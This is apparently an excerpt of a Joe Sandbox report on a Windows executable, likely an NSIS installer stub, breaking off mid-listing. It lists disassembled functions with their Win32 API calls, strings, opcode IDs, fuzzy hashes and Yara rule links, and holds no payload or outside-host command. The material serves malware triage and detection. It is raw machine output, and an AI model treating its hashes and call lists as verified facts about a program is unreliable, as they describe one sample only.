                                                                • Opcode Fuzzy Hash: eda24d9e563f14e56c6da67046dad0d9d72a11225f231514b8bed0d83fcccfef
                                                                • Instruction Fuzzy Hash: 9C127A70D00609EFDB20DFA5CD45AAEBBB5FB84314F10817AEA10BA2E1C7798941DF58
                                                                Function 00403E8E Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403ECA
                                                                • ShowWindow.USER32(?), ref: 00403EE7
                                                                • DestroyWindow.USER32 ref: 00403EFB
                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F17
                                                                • GetDlgItem.USER32(?,?), ref: 00403F38
                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F4C
                                                                • IsWindowEnabled.USER32(00000000), ref: 00403F53
                                                                • GetDlgItem.USER32(?,00000001), ref: 00404001
                                                                • GetDlgItem.USER32(?,00000002), ref: 0040400B
                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404025
                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404076
                                                                • GetDlgItem.USER32(?,00000003), ref: 0040411C
                                                                • ShowWindow.USER32(00000000,?), ref: 0040413D
                                                                • EnableWindow.USER32(?,?), ref: 0040414F
                                                                • EnableWindow.USER32(?,?), ref: 0040416A
                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404180
                                                                • EnableMenuItem.USER32(00000000), ref: 00404187
                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040419F
                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041B2
                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 004041DC
                                                                • SetWindowTextW.USER32(?,0042D268), ref: 004041F0
                                                                • ShowWindow.USER32(?,0000000A), ref: 00404324
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                • String ID:
                                                                • API String ID: 184305955-0
                                                                • Opcode ID: f6cbdb8537d9c16edabc791460abe12f90041ff6636d8a1f2c8cc05f1c6427ba
                                                                • Instruction ID: cb6f0490afd218b95da4ce8f8645ed9f2a2dc6dad26b5163c80864a666f03042
                                                                • Opcode Fuzzy Hash: f6cbdb8537d9c16edabc791460abe12f90041ff6636d8a1f2c8cc05f1c6427ba
                                                                • Instruction Fuzzy Hash: 40C1AFB1600305EFDB206F61EE85E2B7A68FB85706B54053EFA81B11F0CB799841DB2D
                                                                Function 00403AE0 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
                                                                  • Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                • lstrcatW.KERNEL32(00442000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,771B3420,00442800,00440000,00000000), ref: 00403B61
                                                                • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,00440800,00442000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,771B3420), ref: 00403BE1
                                                                • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,00440800,00442000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403BF4
                                                                • GetFileAttributesW.KERNEL32(00432EA0), ref: 00403BFF
                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00440800), ref: 00403C48
                                                                  • Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365
                                                                • RegisterClassW.USER32(00433EA0), ref: 00403C85
                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C9D
                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CD2
                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403D08
                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403D34
                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403D41
                                                                • RegisterClassW.USER32(00433EA0), ref: 00403D4A
                                                                • DialogBoxParamW.USER32(?,00000000,00403E8E,00000000), ref: 00403D69
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                • API String ID: 1975747703-1115850852
                                                                • Opcode ID: 6d1db6ae39746cebd0a3dbab157a1a7a18d1e08731e996c6f126d26afefa6627
                                                                • Instruction ID: ef062d508cd4fc62497976b4bc03dd7eae2cd9e8a178e807e7972486bae2ade7
                                                                • Opcode Fuzzy Hash: 6d1db6ae39746cebd0a3dbab157a1a7a18d1e08731e996c6f126d26afefa6627
                                                                • Instruction Fuzzy Hash: 9A61B8711447006EE320AF66AE46F2B3A6CEBC5B4AF40453FF941B61E1DB7D9901CA2D
                                                                Function 00404526 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045C4
                                                                • GetDlgItem.USER32(?,000003E8), ref: 004045D8
                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045F5
                                                                • GetSysColor.USER32(?), ref: 00404606
                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404614
                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404622
                                                                • lstrlenW.KERNEL32(?), ref: 00404627
                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404634
                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404649
                                                                • GetDlgItem.USER32(?,0000040A), ref: 004046A2
                                                                • SendMessageW.USER32(00000000), ref: 004046A9
                                                                • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404717
                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404725
                                                                • SetCursor.USER32(00000000), ref: 00404728
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404741
                                                                • SetCursor.USER32(00000000), ref: 00404744
                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404773
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404785
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                • String ID: N
                                                                • API String ID: 3103080414-1130791706
                                                                • Opcode ID: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
                                                                • Instruction ID: bc177dfd6b6b6103f733ab6784bbaef7ca361af311f51bfa08924dfc74b84e38
                                                                • Opcode Fuzzy Hash: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
                                                                • Instruction Fuzzy Hash: 79618EB1A00209FFDB109F60DD85AAA7B69FB85314F00843AFA15B72D1D778AD51CF98
                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                • String ID: F
                                                                • API String ID: 941294808-1304234792
                                                                • Opcode ID: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
                                                                • Instruction ID: eaab19ccb9cda740c31967da28403833e1322962c0e6ee158e4036cb66a51054
                                                                • Opcode Fuzzy Hash: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
                                                                • Instruction Fuzzy Hash: ED418B71800209AFCF058FA5CE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                Function 0040605D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061F8,?,?), ref: 00406098
                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004060A1
                                                                  • Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                  • Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE
                                                                • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004060BE
                                                                • wsprintfA.USER32 ref: 004060DC
                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00406117
                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406126
                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040615E
                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004061B4
                                                                • GlobalFree.KERNEL32(00000000), ref: 004061C5
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061CC
                                                                  • Part of subcall function 00405F07: GetFileAttributesW.KERNEL32(00443800,00403055,00443800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
                                                                  • Part of subcall function 00405F07: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                • String ID: %ls=%ls$[Rename]
                                                                • API String ID: 2171350718-461813615
                                                                • Opcode ID: 8cf52ef3d28b69686426f1a310d366aa70b295754e724b75f8fa2b44a42324d6
                                                                • Instruction ID: d46549913b6b20842cf1787bef5cc60fb31ae9cbf3b8bb231415db86ef2d3bba
                                                                • Opcode Fuzzy Hash: 8cf52ef3d28b69686426f1a310d366aa70b295754e724b75f8fa2b44a42324d6
                                                                • Instruction Fuzzy Hash: 9D3135712017157BD2206B218D48F6B3A5CDF45754F15003AFE82FA2C3DA3CE9218ABD
                                                                Function 00404858 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003FB), ref: 004048A7
                                                                • SetWindowTextW.USER32(00000000,?), ref: 004048D1
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404982
                                                                • CoTaskMemFree.OLE32(00000000), ref: 0040498D
                                                                • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 004049BF
                                                                • lstrcatW.KERNEL32(?,00432EA0), ref: 004049CB
                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049DD
                                                                  • Part of subcall function 00405A5B: GetDlgItemTextW.USER32(?,?,00000400,00404A14), ref: 00405A6E
                                                                  • Part of subcall function 004066C0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,00442800,00440000,004034A0,00442800,00442800,0040370F,?,00000007,00000009,0000000B), ref: 00406723
                                                                  • Part of subcall function 004066C0: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406732
                                                                  • Part of subcall function 004066C0: CharNextW.USER32(?,00000000,771B3420,00442800,00440000,004034A0,00442800,00442800,0040370F,?,00000007,00000009,0000000B), ref: 00406737
                                                                  • Part of subcall function 004066C0: CharPrevW.USER32(?,?,771B3420,00442800,00440000,004034A0,00442800,00442800,0040370F,?,00000007,00000009,0000000B), ref: 0040674A
                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404AA0
                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404ABB
                                                                  • Part of subcall function 00404C14: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CB5
                                                                  • Part of subcall function 00404C14: wsprintfW.USER32 ref: 00404CBE
                                                                  • Part of subcall function 00404C14: SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: A
                                                                • API String ID: 2624150263-3554254475
                                                                • Opcode ID: 2962e740f6ae593f3d47cc50505c94d9ed2dda7bf4a20bc562bb36318661b148
                                                                • Instruction ID: 0d1333b798dde08b2b35772059431d035751c92a28532a026af6b574b599a32b
                                                                • Opcode Fuzzy Hash: 2962e740f6ae593f3d47cc50505c94d9ed2dda7bf4a20bc562bb36318661b148
                                                                • Instruction Fuzzy Hash: 56A15EF1A00209ABDB11AFA5CD45AAFB7B8EF84314F10843BF601B62D1D77C99418B6D
                                                                Function 00403015 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 181memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00403026
                                                                • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                  • Part of subcall function 00405F07: GetFileAttributesW.KERNEL32(00443800,00403055,00443800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
                                                                  • Part of subcall function 00405F07: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D
                                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,00443800,00443800,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                • GlobalAlloc.KERNEL32(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                Strings
                                                                • soft, xrefs: 00403103
                                                                • Null, xrefs: 0040310C
                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004031EB
                                                                • Inst, xrefs: 004030FA
                                                                • Error launching installer, xrefs: 00403065
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                • API String ID: 2803837635-527102705
                                                                • Opcode ID: a52360a1b04fecb28cdb34ea46c0a5e0142df37db4d5eb2ecb020a06199e7e0c
                                                                • Instruction ID: 352fdba277142773567f3d30b5bba7b1c47688a28dd7517ec43723b707c69b17
                                                                • Opcode Fuzzy Hash: a52360a1b04fecb28cdb34ea46c0a5e0142df37db4d5eb2ecb020a06199e7e0c
                                                                • Instruction Fuzzy Hash: CF51D331904204ABDB109FA5DD85B9E7EACEB48356F24803BF910BA2D1C77C9F418B9D
                                                                Function 0040644E Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 0040658F
                                                                • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400,00000000,0042C248,?,004054B0,0042C248,00000000), ref: 004065A2
                                                                • SHGetSpecialFolderLocation.SHELL32(004054B0,?,00000000,0042C248,?,004054B0,0042C248,00000000), ref: 004065DE
                                                                • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 004065EC
                                                                • CoTaskMemFree.OLE32(?), ref: 004065F7
                                                                • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040661D
                                                                • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004054B0,0042C248,00000000), ref: 00406675
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040655F
                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406617
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                • API String ID: 717251189-730719616
                                                                • Opcode ID: c4c9f8ebfe012ae1ac9f0905837fe323b2cacdb035eb6525edefd19b4086017f
                                                                • Instruction ID: cd0f296135d024e5542a1133132ccafb23cc3a0c8fe84acec88ebf75cbd5934e
                                                                • Opcode Fuzzy Hash: c4c9f8ebfe012ae1ac9f0905837fe323b2cacdb035eb6525edefd19b4086017f
                                                                • Instruction Fuzzy Hash: 9C614471A00111AADF208F54DD41BBE37A5AF44314F26853FE943B62D0EB3E5AA2CB5D
                                                                Function 0040324C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CountTick$wsprintf
                                                                • String ID: *B$ A$ A$... %d%%
                                                                • API String ID: 551687249-3485722521
                                                                • Opcode ID: c428bd1eebc26d9bdb6e59043e84f0fe6d702dc36464175af9f301d14869d820
                                                                • Instruction ID: 934ec796fb5923f126773143cacc3683187fa16e161fba292e3b1b9e9ada072f
                                                                • Opcode Fuzzy Hash: c428bd1eebc26d9bdb6e59043e84f0fe6d702dc36464175af9f301d14869d820
                                                                • Instruction Fuzzy Hash: 44518C71D00219DBCB11DF65EA84B9E7FA8AF01756F10817BEC10BB2C1C7789A40CBA9
                                                                Function 004043CE Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000EB), ref: 004043EB
                                                                • GetSysColor.USER32(00000000), ref: 00404429
                                                                • SetTextColor.GDI32(?,00000000), ref: 00404435
                                                                • SetBkMode.GDI32(?,?), ref: 00404441
                                                                • GetSysColor.USER32(?), ref: 00404454
                                                                • SetBkColor.GDI32(?,?), ref: 00404464
                                                                • DeleteObject.GDI32(?), ref: 0040447E
                                                                • CreateBrushIndirect.GDI32(?), ref: 00404488
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                • String ID:
                                                                • API String ID: 2320649405-0
                                                                • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                • Instruction ID: dd0feedb065fecc26b382c70af4fe1a3d395924493241b124500faa7aa9dc668
                                                                • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                • Instruction Fuzzy Hash: 7C2174B15007059BCB30DF78DA08B5BBBF8AF81714B05892EE992B26E1D734E904DB58
                                                                Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                  • Part of subcall function 00405FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FFE
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                • String ID: 9
                                                                • API String ID: 163830602-2366072709
                                                                • Opcode ID: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
                                                                • Instruction ID: fc85df120a24998764995467ff6edc9a451c04e372c05a6abf1f77cf4653f2d7
                                                                • Opcode Fuzzy Hash: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
                                                                • Instruction Fuzzy Hash: 5C51F975D00219ABDF20DF95CA89AAEBB79FF04344F10817BE501B62D0E7B49D828B58
                                                                Function 00405479 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(0042C248,00000000,?,771B23A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                • lstrlenW.KERNEL32(004033B0,0042C248,00000000,?,771B23A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
